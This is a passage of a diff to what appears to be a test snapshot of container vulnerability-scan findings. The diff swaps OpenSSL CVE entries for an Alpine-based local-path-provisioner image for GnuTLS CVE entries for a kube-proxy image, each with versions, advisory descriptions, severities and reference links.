"https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AWN56FDLQQXT2D2YHNI4TYH432TDMQ7N/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-24659", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://security.gentoo.org/glsa/202009-01", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://security.netapp.com/advisory/ntap-20200911-0006/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-4491-1", + }, + { + "type": "URL", + "value": "https://usn.ubuntu.com/4491-1/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-24659", + }, + { + "type": "URL", + "value": "https://www.gnutls.org/security-new.html#GNUTLS-SA-2020-09-04", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1l-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-3711", - "installedVersion": "1.1.1g-r0", - "packageName": "libssl1.1", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/26/2", - "https://access.redhat.com/security/cve/CVE-2021-3711", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", - "https://github.com/advisories/GHSA-5ww6-px42-wc85", - "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", - "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", - "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", - "https://security.gentoo.org/glsa/202209-02", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20210827-0010/", - "https://security.netapp.com/advisory/ntap-20211022-0003/", - "https://ubuntu.com/security/notices/USN-5051-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3711", - "https://www.debian.org/security/2021/dsa-4963", - "https://www.openssl.org/news/secadv/20210824.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-16", - "https://www.tenable.com/security/tns-2022-02", + "fixedVersion": "3.6.7-4+deb10u9", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2509", + "installedVersion": "3.6.7-4+deb10u6", + "packageName": "libgnutls30", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:6854", + "https://access.redhat.com/security/cve/CVE-2022-2509", + "https://bugzilla.redhat.com/2108977", + "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", + "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", + "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", + "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", + "https://errata.almalinux.org/9/ALSA-2022-6854.html", + "https://errata.rockylinux.org/RLSA-2022:6854", + "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", + "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", + "https://linux.oracle.com/cve/CVE-2022-2509.html", + "https://linux.oracle.com/errata/ELSA-2022-7105.html", + "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", + "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", + "https://ubuntu.com/security/notices/USN-5550-1", + "https://www.cve.org/CVERecord?id=CVE-2022-2509", + "https://www.debian.org/security/2022/dsa-5203", ], }, "category": "Vulnerability", - "description": "In order to decrypt SM2 encrypted data an application is expected to call the API function EVP_PKEY_decrypt(). Typically an application will call this function twice. The first time, on entry, the "out" parameter can be NULL and, on exit, the "outlen" parameter is populated with the buffer size required to hold the decrypted plaintext. The application can then allocate a sufficiently sized buffer and call EVP_PKEY_decrypt() again, but this time passing a non-NULL value for the "out" parameter. A bug in the implementation of the SM2 decryption code means that the calculation of the buffer size required to hold the plaintext returned by the first call to EVP_PKEY_decrypt() can be smaller than the actual size required by the second call. This can lead to a buffer overflow when EVP_PKEY_decrypt() is called by the application a second time with a buffer that is too small. A malicious attacker who is able present SM2 content for decryption to an application could cause attacker chosen data to overflow the buffer by up to a maximum of 62 bytes altering the contents of other data held after the buffer, possibly changing application behaviour or causing the application to crash. The location of the buffer is application dependent but is typically heap allocated. Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "A vulnerability found in gnutls. This security flaw happens because of a double free error occurs during verification of pkcs7 signatures in gnutls_pkcs7_verify function.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: SM2 Decryption Buffer Overflow", + "name": "Double free during gnutls_pkcs7_verify", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3711", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3711", + "value": "https://avd.aquasec.com/nvd/cve-2022-2509", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://access.redhat.com/errata/RHSA-2022:6854", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", + "value": "https://access.redhat.com/security/cve/CVE-2022-2509", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", + "value": "https://bugzilla.redhat.com/2108977", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-5ww6-px42-wc85", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2076626", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108635", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2108977", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2119770", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2509", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-02", + "value": "https://errata.almalinux.org/9/ALSA-2022-6854.html", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://errata.rockylinux.org/RLSA-2022:6854", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", + "value": "https://gnutls.org/security-new.html (GNUTLS-SA-2022-07-07)", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211022-0003/", + "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2022-07-07", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-1", + "value": "https://linux.oracle.com/cve/CVE-2022-2509.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3711", + "value": "https://linux.oracle.com/errata/ELSA-2022-7105.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4963", + "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00002.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210824.txt", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6FL27JS3VM74YEQU7PGB62USO3KSBYZX/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://lists.gnupg.org/pipermail/gnutls-help/2022-July/004746.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2509", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://ubuntu.com/security/notices/USN-5550-1", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-16", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2509", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-02", + "value": "https://www.debian.org/security/2022/dsa-5203", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1j-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-23840", - "installedVersion": "1.1.1g-r0", - "packageName": "libssl1.1", + "fixedVersion": "3.6.7-4+deb10u10", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0361", + "installedVersion": "3.6.7-4+deb10u6", + "packageName": "libgnutls30", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-23840", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", - "https://github.com/advisories/GHSA-qgm6-9472-pwq7", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", - "https://linux.oracle.com/cve/CVE-2021-23840.html", - "https://linux.oracle.com/errata/ELSA-2021-9561.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", - "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210219-0009/", - "https://ubuntu.com/security/notices/USN-4738-1", - "https://ubuntu.com/security/notices/USN-5088-1", - "https://www.cve.org/CVERecord?id=CVE-2021-23840", - "https://www.debian.org/security/2021/dsa-4855", - "https://www.openssl.org/news/secadv/20210216.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-03", - "https://www.tenable.com/security/tns-2021-09", - "https://www.tenable.com/security/tns-2021-10", + "https://access.redhat.com/errata/RHSA-2023:1141", + "https://access.redhat.com/security/cve/CVE-2023-0361", + "https://bugzilla.redhat.com/2162596", + "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", + "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", + "https://errata.almalinux.org/9/ALSA-2023-1141.html", + "https://errata.rockylinux.org/RLSA-2023:1569", + "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", + "https://gitlab.com/gnutls/gnutls/-/issues/1050", + "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", + "https://linux.oracle.com/cve/CVE-2023-0361.html", + "https://linux.oracle.com/errata/ELSA-2023-1569.html", + "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", + "https://security.netapp.com/advisory/ntap-20230324-0005/", + "https://ubuntu.com/security/notices/USN-5901-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0361", ], }, "category": "Vulnerability", - "description": "Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "A timing side-channel in the handling of RSA ClientKeyExchange messages was discovered in GnuTLS. This side-channel can be sufficient to recover the key encrypted in the RSA ciphertext across a network in a Bleichenbacher style attack. To achieve a successful decryption the attacker would need to send a large amount of specially crafted messages to the vulnerable server. By recovering the secret from the ClientKeyExchange message, the attacker would be able to decrypt the application data exchanged over that connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: integer overflow in CipherUpdate", + "name": "timing side-channel in the TLS RSA key exchange code", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-23840", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-23840", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-qgm6-9472-pwq7", - }, - { - "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", - }, - { - "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "value": "https://avd.aquasec.com/nvd/cve-2023-0361", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-23840.html", + "value": "https://access.redhat.com/errata/RHSA-2023:1141", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "value": "https://access.redhat.com/security/cve/CVE-2023-0361", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://bugzilla.redhat.com/2162596", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2131152", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2162596", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0361", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "https://errata.almalinux.org/9/ALSA-2023-1141.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", + "value": "https://errata.rockylinux.org/RLSA-2023:1569", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4738-1", + "value": "https://github.com/tlsfuzzer/tlsfuzzer/pull/679", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5088-1", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1050", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-23840", + "value": "https://gnutls.org/security-new.html#GNUTLS-SA-2020-07-14", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4855", + "value": "https://linux.oracle.com/cve/CVE-2023-0361.html", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210216.txt", + "value": "https://linux.oracle.com/errata/ELSA-2023-1569.html", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00015.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UFIA3X4IZ3CW7SRQ2UHNHNPMRIAWF2FI/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WS4KVDOG6QTALWHC2QE4Y7VPDRMLTRWQ/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z634YBXAJ5VLDI62IOPBVP5K6YFHAWCY/", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0361", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-03", + "value": "https://security.netapp.com/advisory/ntap-20230324-0005/", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://ubuntu.com/security/notices/USN-5901-1", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-10", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0361", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1k-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-3450", - "installedVersion": "1.1.1g-r0", - "packageName": "libssl1.1", + "fixedVersion": "3.6.7-4+deb10u9", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-4209", + "installedVersion": "3.6.7-4+deb10u6", + "packageName": "libgnutls30", "references": [ - "http://www.openwall.com/lists/oss-security/2021/03/27/1", - "http://www.openwall.com/lists/oss-security/2021/03/27/2", - "http://www.openwall.com/lists/oss-security/2021/03/28/3", - "http://www.openwall.com/lists/oss-security/2021/03/28/4", - "https://access.redhat.com/security/cve/CVE-2021-3450", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b", - "https://github.com/advisories/GHSA-8hfj-xrj2-pm22", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", - "https://linux.oracle.com/cve/CVE-2021-3450.html", - "https://linux.oracle.com/errata/ELSA-2021-9151.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", - "https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3450", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", - "https://rustsec.org/advisories/RUSTSEC-2021-0056.html", - "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210326-0006/", - "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", - "https://www.cve.org/CVERecord?id=CVE-2021-3450", - "https://www.openssl.org/news/secadv/20210325.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-05", - "https://www.tenable.com/security/tns-2021-08", - "https://www.tenable.com/security/tns-2021-09", + "https://access.redhat.com/security/cve/CVE-2021-4209", + "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", + "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", + "https://gitlab.com/gnutls/gnutls/-/issues/1306", + "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", + "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", + "https://security.netapp.com/advisory/ntap-20220915-0005/", + "https://ubuntu.com/security/notices/USN-5550-1", + "https://ubuntu.com/security/notices/USN-5750-1", + "https://www.cve.org/CVERecord?id=CVE-2021-4209", ], }, "category": "Vulnerability", - "description": "The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates. If a "purpose" has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named "purpose" values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application. In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose. OpenSSL versions 1.1.1h and newer are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1h-1.1.1j).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "A NULL pointer dereference flaw was found in GnuTLS. As Nettle's hash update functions internally call memcpy, providing zero-length input may cause undefined behavior. This flaw leads to a denial of service after authentication in rare circumstances.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT", + "name": "GnuTLS: Null pointer dereference in MD_UPDATE", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3450", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/27/1", + "value": "https://avd.aquasec.com/nvd/cve-2021-4209", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/27/2", + "value": "https://access.redhat.com/security/cve/CVE-2021-4209", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/28/3", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2044156", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/28/4", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4209", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3450", + "value": "https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://gitlab.com/gnutls/gnutls/-/issues/1306", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b", + "value": "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-8hfj-xrj2-pm22", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", + "value": "https://security.netapp.com/advisory/ntap-20220915-0005/", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", + "value": "https://ubuntu.com/security/notices/USN-5550-1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3450.html", + "value": "https://ubuntu.com/security/notices/USN-5750-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9151.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-4209", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3389", + "installedVersion": "3.6.7-4+deb10u6", + "packageName": "libgnutls30", + "references": [ + "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", + "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", + "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", + "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", + "http://curl.haxx.se/docs/adv_20120124B.html", + "http://downloads.asterisk.org/pub/security/AST-2016-001.html", + "http://ekoparty.org/2011/juliano-rizzo.php", + "http://eprint.iacr.org/2004/111", + "http://eprint.iacr.org/2006/136", + "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", + "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", + "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", + "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", + "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", + "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", + "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", + "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", + "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", + "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", + "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", + "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", + "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", + "http://marc.info/?l=bugtraq&m=132750579901589&w=2", + "http://marc.info/?l=bugtraq&m=132872385320240&w=2", + "http://marc.info/?l=bugtraq&m=133365109612558&w=2", + "http://marc.info/?l=bugtraq&m=133728004526190&w=2", + "http://marc.info/?l=bugtraq&m=134254866602253&w=2", + "http://marc.info/?l=bugtraq&m=134254957702612&w=2", + "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", + "http://osvdb.org/74829", + "http://rhn.redhat.com/errata/RHSA-2012-0508.html", + "http://rhn.redhat.com/errata/RHSA-2013-1455.html", + "http://secunia.com/advisories/45791", + "http://secunia.com/advisories/47998", + "http://secunia.com/advisories/48256", + "http://secunia.com/advisories/48692", + "http://secunia.com/advisories/48915", + "http://secunia.com/advisories/48948", + "http://secunia.com/advisories/49198", + "http://secunia.com/advisories/55322", + "http://secunia.com/advisories/55350", + "http://secunia.com/advisories/55351", + "http://security.gentoo.org/glsa/glsa-201203-02.xml", + "http://security.gentoo.org/glsa/glsa-201406-32.xml", + "http://support.apple.com/kb/HT4999", + "http://support.apple.com/kb/HT5001", + "http://support.apple.com/kb/HT5130", + "http://support.apple.com/kb/HT5281", + "http://support.apple.com/kb/HT5501", + "http://support.apple.com/kb/HT6150", + "http://technet.microsoft.com/security/advisory/2588513", + "http://vnhacker.blogspot.com/2011/09/beast.html", + "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", + "http://www.debian.org/security/2012/dsa-2398", + "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", 